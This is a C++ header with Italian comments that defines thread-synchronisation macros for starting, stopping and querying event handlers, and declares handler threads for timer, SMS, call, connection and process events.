#include "Common.h"
#include "Sms.h"
#include "Process.h"
#include "Status.h"
#include "Conf.h"
#include <exception>
using namespace std;

#ifndef __Events_h__
#define __Events_h__

#define EVENT_I_AM_ALIVE 	WAIT_AND_SIGNAL(statusObj->hEventsLock); \
	events = statusObj->GetEventsList(); \
	for(iter = events->begin(); iter != events->end(); iter++){ \
	if((*iter)->uEventType == MyID && (*iter)->uActionId == myData->uActionId){ \
	(*iter)->uEventStatus = EVENT_RUNNING; \
	break; \
	} \
	} \
	UNLOCK(statusObj->hEventsLock);

#define EVENT_STOP_ME 	WAIT_AND_SIGNAL(statusObj->hEventsLock); \
	events = statusObj->GetEventsList(); \
	for(iter = events->begin(); iter != events->end(); iter++){ \
	if((*iter)->uEventType == MyID && (*iter)->uActionId == myData->uActionId){ \
	(*iter)->uEventStatus = EVENT_STOPPED; \
	(*iter)->uCommand = 0; \
	UNLOCK(statusObj->hEventsLock); \
	return TRUE; \
	} \
	} \
	UNLOCK(statusObj->hEventsLock);

#define EVENT_WAIT_FOR_STOP 	BOOL bStop = FALSE; \
	while(bStop == FALSE){ \
	WAIT_AND_SIGNAL(statusObj->hEventsLock); \
	events = statusObj->GetEventsList(); \
	for(iter = events->begin(); iter != events->end(); iter++){ \
	if((*iter)->uEventType == MyID && (*iter)->uActionId == myData->uActionId && \
	(*iter)->uCommand == EVENT_STOP){ \
	bStop = TRUE; \
	break; \
} \
	} \
	UNLOCK(statusObj->hEventsLock); \
	MiniSleep(500); \
	}

#define EVENT_CHECK_FOR_STOP	WAIT_AND_SIGNAL(statusObj->hEventsLock); \
	events = statusObj->GetEventsList(); \
	for(iter = events->begin(); iter != events->end(); iter++){ \
	if((*iter)->uEventType == MyID && (*iter)->uActionId == myData->uActionId \
	&& (*iter)->uCommand == EVENT_STOP){ \
	(*iter)->uEventStatus = EVENT_STOPPED; \
	(*iter)->uCommand = 0; \
	UNLOCK(statusObj->hEventsLock); \
	return TRUE; \
	} \
	} \
	UNLOCK(statusObj->hEventsLock);

#define TRIGGER_ACTION(x)	WAIT_AND_SIGNAL(statusObj->hActionsLock); \
	actions = statusObj->GetActionsList(); \
	for(counter = 0, iterA = actions->begin(); iterA != actions->end(); iterA++, counter++){ \
	if(counter == x){ \
	(*iterA)->bTriggered = TRUE; \
	break; \
	} \
	} \
	UNLOCK(statusObj->hActionsLock);

// Valorizza x a TRUE se il thread e' stato marcato per lo STOP, a FALSE altrimenti.
// Questa funzione, a differenza della EVENT_CHECK_FOR_STOP NON ferma il thread!
#define EVENT_QUERY_STOP(x)	WAIT_AND_SIGNAL(statusObj->hEventsLock); \
	x = FALSE; \
	events = statusObj->GetEventsList(); \
	for(iter = events->begin(); iter != events->end(); iter++){ \
	if((*iter)->uEventType == MyID && (*iter)->uActionId == myData->uActionId \
	&& (*iter)->uCommand == EVENT_STOP){ \
	x = TRUE; \
	break; \
	} \
	} \
	UNLOCK(statusObj->hEventsLock);

#define EVENT_COMMON_DATA(x) 	UINT MyID = x; \
	Status *statusObj = Status::self(); \
	list<EventStruct *>::iterator iter; \
	list<EventStruct *> *events; \
	pEventStruct myData = (pEventStruct)lpParam; \
	list<MacroActionStruct *>::iterator iterA; \
	list<MacroActionStruct *> *actions; \
	UINT counter;

DWORD WINAPI OnTimer(LPVOID lpParam);
DWORD WINAPI OnSms(LPVOID lpParam);
DWORD WINAPI OnCall(LPVOID lpParam);
DWORD WINAPI OnConnection(LPVOID lpParam);
DWORD WINAPI OnProcess(LPVOID lpParam);
#endif